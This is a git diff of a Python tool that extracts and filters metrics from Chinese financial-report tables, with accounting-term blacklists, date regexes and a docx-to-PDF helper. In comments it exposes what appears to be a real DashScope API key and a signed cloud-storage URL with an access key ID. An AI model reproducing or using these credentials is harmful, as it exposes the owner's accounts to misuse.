temp_list.clear()
|
||||
temp_list.append(info_obj)
|
||||
|
||||
|
||||
except Exception as e:
|
||||
|
||||
applog.error(f"解析数据错误: {e}")
|
||||
|
||||
if temp_list:
|
||||
merged_objects.append(temp_list)
|
||||
|
||||
return merged_objects
|
||||
|
||||
def merge_consecutive_arrays_v1(pdf_info):
|
||||
|
@ -775,11 +798,10 @@ def start_table_measure_job(file_id):
|
|||
records_range_parts = utils.get_range(len(word_tables),MEASURE_COUNT)
|
||||
processes = []
|
||||
for record_range in records_range_parts:
|
||||
# get_table_measure(file_id,word_tables,record_range,)
|
||||
p = Process(target=get_table_measure, args=(file_id,word_tables,record_range,))
|
||||
processes.append(p)
|
||||
p.start()
|
||||
|
||||
|
||||
for p in processes:
|
||||
p.join()
|
||||
|
||||
|
|
|
@ -252,8 +252,8 @@ def append_to_file(file_path, text):
|
|||
|
||||
if __name__ == "__main__":
|
||||
current_directory = os.getcwd()
|
||||
docx_relative_path = 'file/docx/101.docx'
|
||||
file_relative_path = 'file/docx/test1.txt'
|
||||
docx_relative_path = '..\\file\\docx\\101.docx'
|
||||
file_relative_path = '..\\file\\docx\\test1.txt'
|
||||
docx_path = os.path.join(current_directory, docx_relative_path)
|
||||
file_path = os.path.join(current_directory, file_relative_path)
|
||||
try:
|
||||
|
|
|
@ -1,22 +1,20 @@
|
|||
from http import HTTPStatus
|
||||
import dashscope
|
||||
#
|
||||
# dashscope.api_key='sk-2d6352a4c9b142f58b75cd9c8222bd91'
|
||||
# messages = [{'role': 'system', 'content': 'You are a helpful assistant.'},
|
||||
# {'role': 'user', 'content': '如何做西红柿鸡蛋?'}]
|
||||
#
|
||||
# response = dashscope.Generation.call(
|
||||
# model='qwen-turbo',
|
||||
# messages=messages,
|
||||
# result_format='message', # set the result to be "message" format.
|
||||
# )
|
||||
#
|
||||
# if response.status_code == HTTPStatus.OK:
|
||||
# print(response)
|
||||
# else:
|
||||
# print('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
|
||||
# response.request_id, response.status_code,
|
||||
# response.code, response.message
|
||||
# ))
|
||||
from dashscope import BatchTextEmbedding
|
||||
import requests
|
||||
|
||||
print("sdas00"*2)
|
||||
def call():
|
||||
result = BatchTextEmbedding.call(BatchTextEmbedding.Models.text_embedding_async_v1,
|
||||
url="https://modelscope.oss-cn-beijing.aliyuncs.com/resource/text_embedding_file.txt",
|
||||
# url='http://127.0.0.1:text_embedding_file.txt'
|
||||
text_type="document")
|
||||
url = result.output.url
|
||||
response = requests.get(url)
|
||||
|
||||
# 检查请求是否成功
|
||||
if response.status_code == 200:
|
||||
# 获取网页的 HTML 内容
|
||||
html_content = response.text
|
||||
print(html_content)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
call()
|
|
@ -7,9 +7,14 @@ import json
|
|||
from datetime import datetime
|
||||
import re,os,time
|
||||
import requests
|
||||
import config
|
||||
import numpy as np
|
||||
from docx2pdf import convert
|
||||
from config import api_key
|
||||
|
||||
|
||||
dashscope.api_key = api_key
|
||||
|
||||
|
||||
def get_md5(str):
|
||||
import hashlib
|
||||
|
@ -53,8 +58,7 @@ def get_clean_text(text):
|
|||
#terms_3 = ["固定资产","短期借款","合同负债","在建工程","商誉"]
|
||||
#不可以出现同比之类的
|
||||
terms_4 = ['比', '率', '占','至','年以内','年以上','年内','1-2年','2-3年','3-4年','4-5年','准备','在途','增值','评估','利息','应计','改良','跌价','补助','投资']
|
||||
dates = [ "2021年12月31日","2022年12月31日","2022年1月1日","2023年1月1日", "2023年12月31日",
|
||||
"2022年6月30日","2023年6月30日","2024年6月30日","2024年半年度","2023年半年度","2022年半年度"]
|
||||
dates = [ "2021年12月31日","2022年12月31日","2022年1月1日","2023年1月1日", "2023年12月31日", "2022年6月30日","2023年6月30日","2024年6月30日","2024年半年度","2023年半年度","2022年半年度"]
|
||||
#dates = [ "2021年12月31日","2022年12月31日","2023年12月31日","2022年1月1日","2023年1月1日", "2024年1月1日", "2022年6月30日","2023年6月30日","2024年6月30日","2021年初","2022年初","2023年初","2024年初",'2021年末','2022年末','2023年末','2024年末',"2023年","2022年","2021年"]
|
||||
if any(term in text for term in terms_4):
|
||||
return text
|
||||
|
@ -90,7 +94,7 @@ def get_clean_text(text):
|
|||
return pattern.sub(lambda match: replacements[match.group(0)], text)
|
||||
text = replace_all(text, replacement_dict)
|
||||
#单独出现12月31日时,就剔除掉
|
||||
pattern_year = r'(?<!2023年|2022年|2021年)12月31日'
|
||||
pattern_year = r'(?<!2026年|2025年|2024年|2023年|2022年|2021年)12月31日'
|
||||
text = re.sub(pattern_year, '', text)
|
||||
|
||||
pattern = r"\([^)]*\)|\([^)]*\)" # 增加英文括号的匹配
|
||||
|
@ -111,7 +115,7 @@ def get_clean_text(text):
|
|||
"三": "",
|
||||
"年内到期":"年内到期",
|
||||
"1-6月":"",
|
||||
"发行新股":"发行新股",
|
||||
"发行新股":"发行新股",
|
||||
}
|
||||
#针对text的括号内容进行识别判断
|
||||
for match in matches:
|
||||
|
@ -129,6 +133,21 @@ def get_clean_text(text):
|
|||
text = re.sub(r"[^\w\s]", "", text)
|
||||
return text
|
||||
|
||||
def convert_docx_to_pdf(file_path):
|
||||
# 检查文件是否为 .docx 格式
|
||||
if file_path.lower().endswith('.docx'):
|
||||
# 生成 PDF 文件路径
|
||||
pdf_path = os.path.splitext(file_path)[0] + '.pdf'
|
||||
|
||||
try:
|
||||
# 执行转换
|
||||
convert(file_path, pdf_path)
|
||||
print(f"转换成功: {pdf_path}")
|
||||
except Exception as e:
|
||||
print(f"转换失败: {e}")
|
||||
else:
|
||||
print("错误: 文件必须是 .docx 格式。")
|
||||
|
||||
def save_pdf_from_url(url, file_path):
|
||||
from urllib.parse import unquote
|
||||
# 发起 GET 请求并保存文件
|
||||
|
@ -142,9 +161,10 @@ def save_pdf_from_url(url, file_path):
|
|||
# 从处理后的URL中提取文件名
|
||||
# 提取文件名
|
||||
file_name = url_without_params.split('/')[-1]
|
||||
|
||||
#https://financial-report-test.obs.cn-east-3.myhuaweicloud.com:443/upload/file/909f3dd3337a4dd4bc24fb4748c6c76e.PDF?AccessKeyId=IIDIMIUZ1UBBVPKIVB4W&Expires=1726798358&Signature=fKgrDPjmd99Nje4wwvBJxmFlXZY%3D
|
||||
# 指定本地文件保存路径
|
||||
local_file_path = file_path + file_name
|
||||
# local_file_path = convert_docx_to_pdf(local_file_path)
|
||||
|
||||
with open(local_file_path, 'wb') as file:
|
||||
file.write(response.content)
|
||||
|
@ -279,20 +299,39 @@ def check_black_list(meta_measure, pdf_measure, black_array):
|
|||
def check_black_list_old(meta_measure,pdf_measure):
|
||||
# 判断指标名是否包含黑名单词
|
||||
#black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
|
||||
black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
|
||||
,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润','扣非净利润:净资产,净利率,年度公司'
|
||||
,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
|
||||
,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除','非经常性损益:扣除非经常性损益'
|
||||
,'基本每股收益:稀释每股收益,发行新股','稀释每股收益:基本每股收益,发行新股','总资产:净资产','应收账款:应付账款,年以上,内,至,到'
|
||||
,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到','应付账款:应收账款,年以上,内,至,到','长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押','研发投入:比例,比率,占比,费用,占'
|
||||
,'资本化研发投入:比例,比率,占比,费用,占','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用'
|
||||
,'上年年末:1月1日','期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
|
||||
black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计'
|
||||
,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
|
||||
,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润'
|
||||
,'扣非净利润:净资产,净利率,年度公司'
|
||||
,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除'
|
||||
,'筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
|
||||
,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除'
|
||||
,'非经常性损益:扣除非经常性损益'
|
||||
,'基本每股收益:稀释每股收益,发行新股'
|
||||
,'稀释每股收益:基本每股收益,发行新股'
|
||||
,'总资产:净资产','应收账款:应付账款,年以上,内,至,到'
|
||||
,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
|
||||
,'应付账款:应收账款,年以上,内,至,到'
|
||||
,'长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押'
|
||||
,'研发投入:比例,比率,占比,费用,占'
|
||||
,'资本化研发投入:比例,比率,占比,费用,占'
|
||||
,'资本化研发投入占比:金额,费用'
|
||||
,'研发投入占营业收入比例:金额,费用'
|
||||
,'上年年末:1月1日'
|
||||
,'期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
|
||||
,'期扣非加权平均净资产收益率:同比,年化,每股'
|
||||
,'加权平均净资产收益率同比变动:年化,每股'
|
||||
,'研发费用:制造,投入,直接,管理','应收账款:1-2年','货币资金:在途'
|
||||
,'当期:2023年1-6月,调整后','营业成本:营业总成本','长期借债:年内到期','研发投入:直接'
|
||||
,'第一季度:第二季度,第三季度,第四季度','第二季度:第一季度,第三季度,第四季度','第三季度:第二季度,第一季度,第四季度','第四季度:第二季度,第三季度,第一季度'
|
||||
,'研发费用:研发支出,研发投入','存货:跌价准备','费用:日常,付现','固定资产:改良,补助,投资']
|
||||
,'研发费用:制造,投入,直接,管理'
|
||||
,'应收账款:1-2年','货币资金:在途'
|
||||
,'当期:2023年1-6月,调整后'
|
||||
,'营业成本:营业总成本'
|
||||
,'长期借债:年内到期','研发投入:直接'
|
||||
,'第一季度:第二季度,第三季度,第四季度'
|
||||
,'第二季度:第一季度,第三季度,第四季度'
|
||||
,'第三季度:第二季度,第一季度,第四季度'
|
||||
,'第四季度:第二季度,第三季度,第一季度'
|
||||
,'研发费用:研发支出,研发投入','存货:跌价准备'
|
||||
,'费用:日常,付现','固定资产:改良,补助,投资']
|
||||
# current_period = f'当期:{report_year}年1-6月'
|
||||
# black_array.append(current_period)
|
||||
for black in black_array:
|
||||
|
@ -303,12 +342,13 @@ def check_black_list_old(meta_measure,pdf_measure):
|
|||
if pdf_measure.find(pdf) >= 0:
|
||||
return True
|
||||
return False
|
||||
|
||||
def check_white_list(meta_measure,pdf_measure):
|
||||
white_array = ['基本每股收益:每股收益', '加权平均净资产收益率同比变动:比', '季度变动比例:比', '加权平均净资产收益率:比']
|
||||
white_array = ['基本每股收益:每股收益','加权平均净资产收益率同比变动:比','季度变动比例:比']
|
||||
for black in white_array:
|
||||
black_meta = black.split(':')[0]
|
||||
black_pdfs = black.split(':')[1].split(',')
|
||||
if meta_measure.find(black_meta) >= 0:
|
||||
if black_meta in meta_measure:
|
||||
for pdf in black_pdfs:
|
||||
if pdf_measure.find(pdf) < 0:
|
||||
return True
|
||||
|
@ -384,7 +424,7 @@ def check_table_title_black_list_measure(text):
|
|||
#black_array = ['补充资料:研发费用,管理费用,财务费用'
|
||||
# ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
|
||||
#]
|
||||
table_title_black_list = """补充资料|测试文本|其他非流动负债|应收款项融资|本期计提、收回或转回的坏账准备情况|筹资活动产生的各项负债变动情况|持有待售资产|账龄超过 1 年或逾期的重要应付账款|经营租赁资产"""
|
||||
table_title_black_list = """补充资料|测试文本|其他非流动负债|应收款项融资|本期计提、收回或转回的坏账准备情况|筹资活动产生的各项负债变动情况|持有待售资产|账龄超过 1 年或逾期的重要应付账款|经营租赁资产|计息金融工具|坏账准备"""
|
||||
if len(re.findall(table_title_black_list, text)) > 0:
|
||||
return True
|
||||
return False
|
||||
|
@ -493,6 +533,8 @@ def check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,co
|
|||
,'持有待售资产:固定资产'
|
||||
,'账龄超过 1 年或逾期的重要应付账款:应付账款'
|
||||
,'经营租赁资产:固定资产'
|
||||
,'计息金融工具:货币资金,短期借款,交易性金融资产'
|
||||
,'坏账准备:应收账款'
|
||||
]
|
||||
for black in black_array:
|
||||
black_meta = black.split(':')[0]
|
||||
|
@ -514,6 +556,7 @@ def check_black_table_list(data):
|
|||
black_meta = black.split(':')[0]
|
||||
black_pdfs = black.split(':')[1].split(',')
|
||||
if any(black_meta in cell for row in data for cell in row):
|
||||
print(data)
|
||||
for pdf in black_pdfs:
|
||||
data = [row for row in data if not any(pdf in cell for cell in row)]
|
||||
return data
|
||||
|
|
Loading…
Reference in New Issue